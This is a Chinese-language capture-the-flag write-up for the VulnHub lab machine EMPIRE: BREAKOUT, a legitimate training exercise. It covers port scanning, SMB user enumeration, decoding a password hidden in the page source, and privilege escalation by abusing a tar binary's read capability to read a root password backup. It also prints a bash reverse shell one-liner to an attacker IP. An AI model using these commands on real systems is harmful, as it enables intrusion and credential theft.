準備：
攻擊機：虛擬機kali、本機win10 。
靶機：EMPIRE: BREAKOUT，地址我這里設置的橋接，下載地址：https://download.vulnhub.com/empire/02-Breakout.zip，下載后直接VirtualBox打開，如果使用vm打開可能會存在ip問題 。
涉及的知識點：shell反彈、權限提升、smb、samba掃描、解密、getcap命令的使用（查看可執行文件獲取的內核權限） 。

文章插圖
信息收集：
使用nmap掃描靶機開放的端口和對應的具體服務信息 ， 命令：nmap -T4 -sV -p- -A 192.168.1.4 。

文章插圖
對80端口進行文件掃描，但是未發現什么有用的信息 。
【vulnhub靶場之EMPIRE】

文章插圖
分別訪問下80、10000、20000端口，發現80是一個默認的頁面，10000和20000頁面是兩個登錄頁面 。

文章插圖


文章插圖


文章插圖
嘗試對登錄窗口進行注入、爆破均失敗，但是在80端口的源代碼信息中發現了一串加密的字符串 。
<!--don't worry no one will get here, it's safe to share with you my access. Its encrypted :)++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>++++++++++++++++.++++.>>+++++++++++++++++.----.<++++++++++.-----------.>-----------.++++.<<+.>-.--------.++++++++++++++++++++.<------------.>>---------.<<++++++.++++++.-->

文章插圖
開始滲透：
在http://esoteric.sange.fi/brainfuck/impl/interp/i.html網站對字符串進行解密，獲得字符串：.2uqPEfj3D<P'a-3

文章插圖
觀察到139、445端口開啟的samba軟件（基于smb協議），因此我們可以使用enum4linux（smb、samba專用掃描器）來進行掃描以下，命令：enum4linux 192.168.1.4，獲得用戶名：cyber 。

文章插圖
使用獲得賬戶名和密碼嘗試進行登錄：cyber/.2uqPEfj3D<P'a-3，發現在20000端口可以登錄成功并具有shell權限 。

文章插圖
在cyber賬戶權限下找到第一個flag 。

文章插圖
提權：
在/cyber目錄下我們還發現了tar文件，查看文件權限發現其具有可執行權限 ， 命令：ls -l 。

文章插圖
那我們就查看下該文件執行時所具有的內核權限，命令：getcap tar ， 發現其可以繞過文件的讀權限檢查以及目錄的讀/執行權限的檢查（cap_dac_read_search表示的就是這個意思） 。

文章插圖
對網站目錄目錄進行查看，最后在/var目錄下發現backup文件，其他目錄下未發現有用信息 。

文章插圖
在/backups文件夾下發現密碼的備份文件：.old_pass.bak

文章插圖
然后對.old_pass.bak文件進行壓縮和解壓就可以讀取root密碼 ， 壓縮密碼：./tar -cvf upfine.tar /var/backups/.old_pass.bak，解壓密碼：./tar -xvf upfine.tar ， 然后進入/var/backups目錄下讀取.old_pass.bak文件，發現root密碼：Ts&4&YurgtRX(=~h 。

文章插圖
到這里的話有兩種方式 ， 第一種：在10000端口采用：admin/Ts&4&YurgtRX(=~h，進行登錄 ， 進入后可直接獲得root賬戶權限 。

文章插圖
第二種：反彈一個shell，在kali中開啟對8899端口的監聽，命令：nc -lvvp 8899，然后在靶機中執行bash命令：bash -c 'bash -i >& /dev/tcp/192.168.1.12/8899 0>&1' 。

文章插圖
在反彈的shell中切換root用戶并查看root下的文件信息，成功獲得第二個flag 。

推薦閱讀

• 

  職場女強人的星座女巨蟹女
• 

  保衛蘿卜深海16攻略 保衛蘿卜深海攻略2關
• 

  李廣的生平事跡 李廣人物介紹
• 

  今日查詢價格3011元，今日查詢價格3011元寶？
• 

  四個木念什么 四個木念什么呀
• 

  當一個女人不愛你了會有什么表現
• 

  2006年屬狗的是什么命五行屬什么
• 

  報考的c1考了科目一可以改成c2嗎 報的是c1,考了科一,想換成c2可以不
• 

  關于閃長巖簡述 閃長巖
• 

  宋媽后來怎么樣了 宋媽后來怎樣了
• 

  2021年正月初六出生的寶寶名字如何取,簡約大氣旺生肖
• 

  造夢西游4手機版龍幣怎么得到
• 

  淡豆豉煮水喝有什么作用與功效 淡豆豉煮水喝有什么作用
• 

  知名女星李羲兒車禍縫54針！一臉血跡躺倒在地，車子翻轉掉落田溝 ...
• 

  交通事故索賠需要準備哪些誤工費證據
• 

  飛機托運酒水規定2022 國內飛機能帶酒嗎？
• 

  平凡的世界讀書心得初二優秀作文700字
• 

  vivox21耗電快怎么辦 vivox21耗電快怎么解決
• 

  光遇12月3日復刻旅行先祖兌換物品要多少蠟燭,高手進階
• 

  關于跑跑姜餅人簡述 跑跑姜餅人

• 我的Vue之旅 07 Axios + Golang + Sqlite3 實現簡單評論機制
• Tomcat 調優之從 Linux 內核源碼層面看 Tcp backlog
• 【算法訓練營day7】LeetCode454. 四數相加II LeetCode383. 贖金信 LeetCode15. 三數之和 LeetCode18. 四數之和
• 地下城堡3：魂之詩10月9日禮包兌換碼是什么
• vulnhub靶場|NAPPING: 1.0.1
• flutter系列之:builder為構造器而生
• 王者榮耀妲己時之奇旅皮膚的臺詞都有什么
• 地下城堡2：黑暗覺醒圖28漩渦之底怎么通關
• 陰陽師六道之門無針女5分鐘怎么速刷
• 原神3.1百人一揆第二天人間之證明怎么用試用角色拿2000分